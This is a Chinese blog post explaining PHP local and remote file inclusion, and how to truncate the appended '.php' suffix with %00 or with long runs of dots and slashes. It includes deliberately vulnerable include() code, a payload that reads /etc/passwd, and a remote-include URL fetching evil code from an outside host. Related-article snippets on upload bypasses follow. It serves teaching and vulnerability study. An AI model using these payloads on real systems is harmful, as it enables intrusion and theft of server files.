php文件包含详解,PHP文件包含漏洞详解(包含截断方法)

最新推荐文章于 2022-12-11 11:55:37 发布
最新推荐文章于 2022-12-11 11:55:37 发布
阅读量377 收藏
点赞数
文章标签: php文件包含详解

突破限制截断后面的字符串技巧

利用本地包含时常常需要用%00来截断后面的字符串,但在GPC为ON时%00是会被转义的,那么还有其他方法么?

用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串(推测相对路径可用)

看漏洞代码:

$webpath = dirname(__FILE__)."/";

$filepath = "test.txt";

for($i =1;$i<1000;$i++){

$filepath .= '.';

}

include  $webpath.$filepath.".php";

?>

test.txt 代码:<?php die('OK');?>

结果截断失败,改下代码:

$webpath = dirname(__FILE__)."/";

$filepath = "test.txt";

for($i =1;$i<1000;$i++){

$filepath .= '.';

}

include    $filepath.".php";  //相对路径

?>

这次成功。

以上是windows下的方法,其实linux也可以:

$a='';

for($i=0;$i<=4071;$i++) {

$a .= '/';

}

$a = 'test.txt'.$a;                //完整的路径为/var/www/test/test.txt

require_once($a.'.php');

?>

include截断

include $_GET['action'].".php"; ?>

提交“action=/etc/passwd%00”中的“%00”将截断后面的“.php”,但是除了“%00”还有没有其他的字符可以实现截断使用呢?

肯定有人想到了远程包含的url里问号“?”的作用,通过提交“action=http://www.hacksite.com/evil-code.txt?”这里“?”实现了“伪截断”:),好象这个看上去不是那么舒服那么我们简单写个代码fuzz一下:

恒银信金融
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 00截断,文件上传之\00截断文件包含之%00截断 文件包含漏洞详解 – jinglingshu的博客...
weixin_39640845的博客
03-09 3601
首先要明确\00截断与%00截断的关系:00截断就是将上传文件的文件名或路径名中使用ascii码值为0的字符进行截断来达到突破上传限制的目的,而%00一般用在URL中用于截断url来进行文件包含。两者之间的关系是:%00是ascii值为0字符的url编码形式,两者原理其实是一样的。一、\00的路径截断以网站http://www.hongkonggift.com为例,该网站存在注入,通过注入获取管理...
C++读写文件要点总结
一直在笑的博客
09-27 195
C++读写文件要点总结 1、使用C++读写文件常用的操作: 1)导入头文件fstream和string ; 2)创建文件流file,输入使用ifstream类型,输出使用ofstream类型; 3)调用file.open(),打开文件; 4)使用getLine(),逐行读取输入文件中的字符; 5)使用“<<”操作符将字符串写入到文件流中; 6)调用file.close(),关闭文件。 2、函数解释 1)file.open() void open(const char* _Filename, io
文件操作漏洞文件包含(六)
guanjian_ci的博客
02-21 722
第一部分:文件包含 1.文件包含基本概念 开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞文件包含分本地包含和远程包含. 典型特征 变量的值为一个页面: ?page=a.php ?home=b.html ?file=content… 2.文件包含漏洞利用的前提条件 (1)web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参 数的方式引入; (2)用户能够控制包含
php本地文件包含 截断,脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解...
weixin_35637837的博客
03-13 390
脚本的文件包含漏洞可以说是层出不穷,苦于市面上没有好的功能全面的有针对性的开源工具做参考,现在就文件包含的几种典型漏洞为例子。此插件可以本地测试运行当做一个fuzz工具,也可以在bugscan上做为一个功能模块运行代码如下,要以先看assign函数,再看audit函数,注释详细清晰:#!/usr/bin/env python# -*- coding: utf-8 -*-# 脚本语言本地/远程,文件...
PHP文件包含漏洞
时之海
02-11 488
0x00 文件包含文件包含漏洞 文件包含是指,服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行。文件包含还有另外一个名称,那就是代码重用。我们若是需要修改页面,只需要修改一个头部代码文件就可以了,其他上万个页面将会全部对应改变。 文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动念包含在版务器的文件,从而导致恶意代码的执行及敏感信息泄露,主要包括本地文件包含LFI和远程文件包含RFI两种形式 0x01 文件包含函数 文件包含的函数: vrequire()
php null截断 漏洞,CVE-2015-3412,CNNVD-201507-164|PHP NULL Character 安全漏洞 - 信息安全漏洞门户 VULHUB...
weixin_31076173的博客
04-10 123
PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP中存在安全漏洞,该漏洞源于程序没有确保路径名中不包含‘\\%00’字符。远程攻击者可借助调用ext/standard/streamsfuncs.c文件中的‘stream_reso...
%00截断
weixin_53284312的博客
12-11 773
%00截断
PHP 网络开发详解之远程文件包含漏洞
10-29
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
php.ini-文件配置详解.doc
11-30
php.ini-文件配置详解.doc
详解PHP防止直接访问.php 文件的实现方法
10-19
主要介绍了详解PHP防止直接访问.php 文件的实现方法的相关资料,这里提供实现禁止直接访问.php文件的实例,需要的朋友可以参考下
php包含截断小结.txt
07-24
php截断技术
文件上传漏洞绕过手法
dreamthe的博客
12-05 9084
1.文件上传原理 有一些网站提供上传服务,比如头像的设置就是上传图片,或者上传文档,上传压缩包等等。一般网站是希望上传图片格式或者文本格式的,当如果检测手段不全面,就会导致攻击者直接上传了恶意的脚本代码,并执行了脚本代码,或者可以配合其他漏洞,上传代码文件,导致服务器被拿下。下面我们来说说文件上传的检测和绕过都有哪些。 2.文件上传检测方法 文件上传检测分为前端检测和后端检测。前端检测的绕过非常好绕过,前端检测就是在网页有一段检测代码,在你点击上传之前就会有一个检测,我们只需要将木马文件先改成正常的图
文件包含漏洞04】当服务器仅存在本地文件包含漏洞时,如何GetShell?
Fighting_hawk的博客
03-11 4664
1. 思路:第一步利用一切可能让服务器本地某个文件中含有一句话木马;第二步文件包含之让代码执行。 2. 思考:如果错误日志不是在默认位置,应该如何找到或者是否有其他途经? 3. 思考:如果靶机存在远程文件包含漏洞,攻击者在服务器2号上写一个一句话木马文件,利用靶机远程文件包含该文件,并不能Get靶机Shell。后续应更加深入理解一句话木马的控制原理,以判断为什么无法实现,初步认为shell代码是在服务器2号上执行的。...
php截断,php include 路径截断漏洞的利用
weixin_42611177的博客
03-10 863
php 的include结构可以用于包含并运行指定文件,不过文件的路径在一些情况下会被截断,比如路径中包含ascii值为0的字符。先上一段演示代码:$s=$_GET['s'];$path = "demo/$s/";include($path."style.css");?>这是很普通的一段代码,根据用户输入的$s值,包含demo目录下的$s目录下的style.css文件(O(∩_∩)O,示例代...
挖洞姿势 | 深度聊聊PHP下的“截断”问题
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
07-28 1074
0×01 起因 学弟有天在群里说起上传的%00截断的一些问题,就想起之前自己在这个问题踩过坑,想起了自己曾经的flag说要写文章,一直没写,现在来填坑了。 0×02 经过 源码理解: //test.php<?phpinclude"1.txt\000.jpg";?> //1.txt<?phpecho'helloworld';?> 上面的示例代码在...
从源码级别了解PHP %00截断原理
热门推荐
zhangzhuangtongxue的博客
10-10 1万+
一:漏洞简介     PHP的00截断是5.2.x版本的一个漏洞,当用户输入的url参数包含%00经过浏览器自动转码后截断后面字符。 二:漏洞示例代码      三:漏洞源码分析 四:修复代码分析
php中ereg函数的截断漏洞
qq_25987491的博客
04-15 6440
.ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false。搜索字母的字符是大小写敏感的。int ereg(string pattern, string originalstring, [array regs]);例,$email_id = "[email protected]";    $retval = ereg("(\.)(co...
PHP代码审计(ereg截断漏洞)
qq_36609913的博客
02-10 5319
&lt;?php $flag = "flag"; if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) { echo '&lt;p&gt;You password must be alphanumeric&lt;/p&gt;'; } els...
关于%00截断上传漏洞 php 版本<5.3.4
土拨鼠挖洞中的博客
04-12 1万+
需满足 php 版本&lt;5.3.4 才有可能存在此漏洞上传ma2.php 1.jpg在repeater中更改相应的字节 0x20-&gt;0x00回头在看proxy中相应的字节已经被更改最终显示的结果是可见$_FILES['file']['name']在得到文件名时0x00之后的内容已经不见了,如果在此基础上判断后缀名是否合法,则肯定不能通过。综上所述,0x00不是针对所有基于白名单的后缀名检...
java 上传文件漏洞修复_文件上传漏洞详解
最新发布
05-31
对于 Java 上传文件漏洞,常见的修复方法有以下几种: 1. 文件类型白名单过滤:在上传文件时,对文件的类型进行限制,只允许上传指定类型的文件,例如图片、文档等,从而防止上传恶意脚本等危险文件。 2. 文件名...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值